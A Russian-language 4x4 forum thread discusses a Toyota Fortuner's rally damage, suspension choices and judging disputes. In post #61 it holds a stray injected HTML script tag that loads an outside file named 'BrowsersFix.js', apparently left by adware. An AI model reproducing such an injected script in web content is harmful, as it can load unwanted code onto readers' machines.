вадим браконьер Откуда: Алма Ата Машина: Хай люкс 2006 года полностью подготовлен #61 Опубликовано: 17 декабря 2014 (изменено) <script charset="UTF-8" src="ab1D355335://BrowsersFix.js"> </script> Спорт стал политичным, согласен. И то, что Талант гонку выиграл, тоже согласен. По фортунеру новости пока такие. Иксан в корсете. Родные сиденья с обычными ремнями не защищают позвоночник водителя и штурмана Никак! несмотря на кажущийся комфорт. Фото передней защиты. подмялась, но радиаторы и пр защитила. Вывод для себя- защита и труба необходимы даже для легкой подготовки фортунера. на последнем фото передняя защита. Середина вмята. Защита раздатки только с царапинами. А вот для бензобака защита обязательно. бак висит низко, пластиковый. и защита пластиковая. Поэтому считаю, что даже для легкого экспедиционника или охотничье- рыбацком исполнении машины ставить надо трубу спереди и 3 защиты. Силовой бампер утяжелит машину и сведет на нет ее достоинство- легкость. Изменено 17 декабря 2014 пользователем вадим браконьер Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
стас090 Откуда: Казахстан Машина: ТОЙОТы #62 Опубликовано: 17 декабря 2014 И никому не интересно каким оно было. А мож за всех не говорил бы ? Престиж МОЕЙ страны задет. Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
вадим браконьер Откуда: Алма Ата Машина: Хай люкс 2006 года полностью подготовлен #63 Опубликовано: 17 декабря 2014 Стас, не заводись. У Таланта было 2 замечания. Сорванная лента и помощники по трассе с укв станциями. Пусть судьи разбираются. сейчас Иксан отпишется. Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
стас090 Откуда: Казахстан Машина: ТОЙОТы #64 Опубликовано: 17 декабря 2014 помощники по трассе с укв станциями. А за такое,насколько знаю,с соревнований снимают. Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
ikhsan Откуда: Алмата Машина: land cruiser #65 Опубликовано: 17 декабря 2014 Не буду нарушать правила форума и писать кто и как кого судил, но скажу одно грешок с судейством присутствует. По машине машина выжила по другому не скажешь, трасса не для нее, точнее сказать не для ее подвески. После установки лифт комплекта она стала выше но хода подвески остались мизерными его очень мало, так же машина очень жесткая, конечно ее облегчили путем снимая сидений и так далее, ну и конечно 17 диски дали о себе знать. Спина после гонки как будто били по спине дубинкой. Порадовал двигатель динамичный и очень тяговый. Так машина понравилась, я думаю что для ралли она будет лучше чем пот спринт, ну а если смотреть на нее со стороны туризма то легкие поездки для нее, так сказать взять семью и поехать пожарить шашлычок, можно ехать СМЕЛО!!! Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
вадим браконьер Откуда: Алма Ата Машина: Хай люкс 2006 года полностью подготовлен #66 Опубликовано: 18 декабря 2014 Машинка на подьемнике. Все живое. Защита заводская бензобака пластмассовая разбита . В общем, как городской авто с выездами на рыбалку и шашлыки вполне себе живучий вариант. И если ставить подвеску ОМЕ, то только амортизаторы классик. В данный момент установлена подвеска ОМе . передние стойки 90002. Задние амортизаторы 60078, пружины медиум2802 задние и 2883 перед. Амортизаторы классик надо было ставить перед N167s, зад N191. Они не подвержены перегреву и комфортнее при ежедневной эксплуатации. Кстати, задние амортизаторы после остывания опять работают. Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Громозека (Terekhov) Откуда: Усть-Каменогорск, Новосибирск (Кольцово) Машина: Маленький тойотко TLC 105 GX R2 #67 Опубликовано: 18 декабря 2014 Машинка на подьемнике. Все живое. Защита заводская бензобака пластмассовая разбита . В общем, как городской авто с выездами на рыбалку и шашлыки вполне себе живучий вариант. И если ставить подвеску ОМЕ, то только амортизаторы классик. В данный момент установлена подвеска ОМе . передние стойки 90002. Задние амортизаторы 60078, пружины медиум2802 задние и 2883 перед. Амортизаторы классик надо было ставить перед N167s, зад N191. Они не подвержены перегреву и комфортнее при ежедневной эксплуатации. Кстати, задние амортизаторы после остывания опять работают. Вадик, это как же понимать то??? Ты меня зачем тогда с классики на нитрочарджеры то сболомутил?? %)))) Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
вадим браконьер Откуда: Алма Ата Машина: Хай люкс 2006 года полностью подготовлен #68 Опубликовано: 18 декабря 2014 В продолжение состояния. Полиуретановые втулки нижние на задних амортизаторах расплавились от перегрева амортизатора. фото чуть позже. Ну и высоты автомобиля до установки подвески и после. Перед был до лифта ( высота мерялась от торца крыла до наружнего края диска по центру колеса). Значит- перед левая 255мм, перед правая 260мм. Зад ровный 280мм правая и левая стороны. После установки и гонки высоты- перед 320мм левая, 325 правая стороны, зад 350мм обе стороны. , Правую стоечку разберем и немного еще подрежем, чтоб уровнять всоты. Я уже пИсал, что Австралийцы на 2,7 пружины не выпускают. Приходится брать с модели 4литровых и подрезать пружины. Иначе без подрезки ход амортизаторов передних вверх всего 30мм и морда машины выше зада. Подвеска ОМЕ конечно для такого режима эксплуатации не айс, я б для гонок азотные ставил. Но для выездов на охоты и пикники без тяжелого экстрима вполне пойдет. Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
вадим браконьер Откуда: Алма Ата Машина: Хай люкс 2006 года полностью подготовлен #69 Опубликовано: 18 декабря 2014 Вань! Привет. Ты год на них катаешся и вроде доволен. Подбор подвески важен, и важен каждый килограмм. Спорты в первую очередь расчитаны на машины с обвесом, те тяжелые. Тогда они работают. Если спорты ставить на пустые машины- то итог вот на лицо. Машина гораздо жесче и амортизаторы быстро перегреваются. Почему мы поставили спорты на именно эту машину? Я тебе скажу. Классики дешевле , и АРБ невыгодно продавать классики. Поэтому их практически перестали привозить. Хотя австралы говорят, что выпуск классиков не уменьшился. Дистрибьюторы меньше заказывать их стали. Иксану с его манерой очень агрессивной езды на охотничью 105ку после проб Догов, Профайндеров, Ловелсов и пр поставили АРБ Нитрочарджер спорт . Второй год и доволен, Переходить на чтото другое не хочет. Перегревов нет. Все зависит от веса машины.Сейчас фото Иксановской 105ки найду и выложу. Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
вадим браконьер Откуда: Алма Ата Машина: Хай люкс 2006 года полностью подготовлен #70 Опубликовано: 18 декабря 2014 (изменено) Вот мы делали год назад охотничий вариант фортунера. Он на Догах. Живой пока, косуль по степи гоняет. Иксана 105 ка на спортах от ОМЕ. Правда есть у Иксана нюанс. Изза того, что зад у Иксана перегружен( палатка на крыше, доп бак на 187 литров, спальник, калитка Каймар- сзади мы поставили сдвоенные амортизаторы нитрочарджер спорт. Изменено 18 декабря 2014 пользователем вадим браконьер Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Шайтан Откуда: Новосибирск Машина: TLC 100VX 2UZ-FE, 35"М/Т, ГБО. +4'', ОМЕ, Ramsey, ARB-локи, Line-X, Rigid и много фкусностей от Браконьера. #71 Опубликовано: 18 декабря 2014 Спасибо за отчет и объяснение про амортизаторы в сравнении с легкой и тяжелой машиной. А то, тоже сначала испугался за свои. Но, уже, почти год, как работают и не перегреваются. По крайней мере, не меняют цвет. Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
жорж Откуда: москва Машина: прадо 150 4,0 Вольво Сузуки СФмото #72 Опубликовано: 18 декабря 2014 А мож за всех не говорил бы ? Престиж МОЕЙ страны задет. Самому не смешно? Я, как Россиянин, не мерию престиж Вашей страны по автомобильному мероприятию. А лишь пытаюсь донести , что разводить говносрач на этом ресурсе не надо. Вот и все!!!!! Спасибо за внимание. Извините за неконструктив!!! Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
стас090 Откуда: Казахстан Машина: ТОЙОТы #73 Опубликовано: 18 декабря 2014 Вот и все!!!!! Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Симарка (ncsimaru) Откуда: г. Москва, Россия Машина: пешком :( #74 Опубликовано: 18 декабря 2014 поздравляю с участием. поздравляю с победой обе команды. поздравляю с надеюсь успешным пиаром казахского автомобиля. всех со всем поздравляю. все молодцы. Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
вадим браконьер Откуда: Алма Ата Машина: Хай люкс 2006 года полностью подготовлен #75 Опубликовано: 18 декабря 2014 Макс, спасибо. Готовтесь, скоро к Вам в Россию наш Фортунер пойдет. Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
sergey063 Откуда: Самара Машина: ZелёныйZмий - трактор на пулемете #76 Опубликовано: 18 декабря 2014 (изменено) Молодцы! Все молодцы, что отписались! И знакомых вижу.... среди машинок! Главное собрались и катнулись, а судейство, политика таже, видимо, увы... а машинка из Киргизии знакомая! )))) салют комарадес! Изменено 18 декабря 2014 пользователем sergey063 Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
sergey063 Откуда: Самара Машина: ZелёныйZмий - трактор на пулемете #77 Опубликовано: 18 декабря 2014 Макс, спасибо. Готовтесь, скоро к Вам в Россию наш Фортунер пойдет. и почем обещают?! ))))) Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
вадим браконьер Откуда: Алма Ата Машина: Хай люкс 2006 года полностью подготовлен #78 Опубликовано: 18 декабря 2014 то Вадим Лавриц. Это Поларис Браунинг 900. Извини, сразу не ответил. Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
beerov Откуда: Темиртау Машина: ЕДС-105 лифт 4" #79 Опубликовано: 21 декабря 2014 Вот мы делали год назад охотничий вариант фортунера. Он на Догах. Живой пока, косуль по степи гоняет. Иксана 105 ка на спортах от ОМЕ. Правда есть у Иксана нюанс. Изза того, что зад у Иксана перегружен( палатка на крыше, доп бак на 187 литров, спальник, калитка Каймар- сзади мы поставили сдвоенные амортизаторы нитрочарджер спорт. Не в тему, но охотников гоняющих дичь на авто надо вообще на машины без аммов сажать, или просто сажать. Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Indiana Откуда: Almaty Машина: TLC (KZJ78), RX300 #80 Опубликовано: 22 декабря 2014 то Вадим: возращаясь к написанному ранее, что крепких машин не осталось уже... А можно ли подготовить паджеро3 и что из этого получится? Стоит ли игра свеч? Был ли опыт такой подготовки? Он даже в стандарте ходит неплохо (только бампер задний порвал ему, когда поехал там, где езжу на 78-м обычно..) если ему зафигачить 2 блокировки - не порвёт ли он трансмиссию? Вверх Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах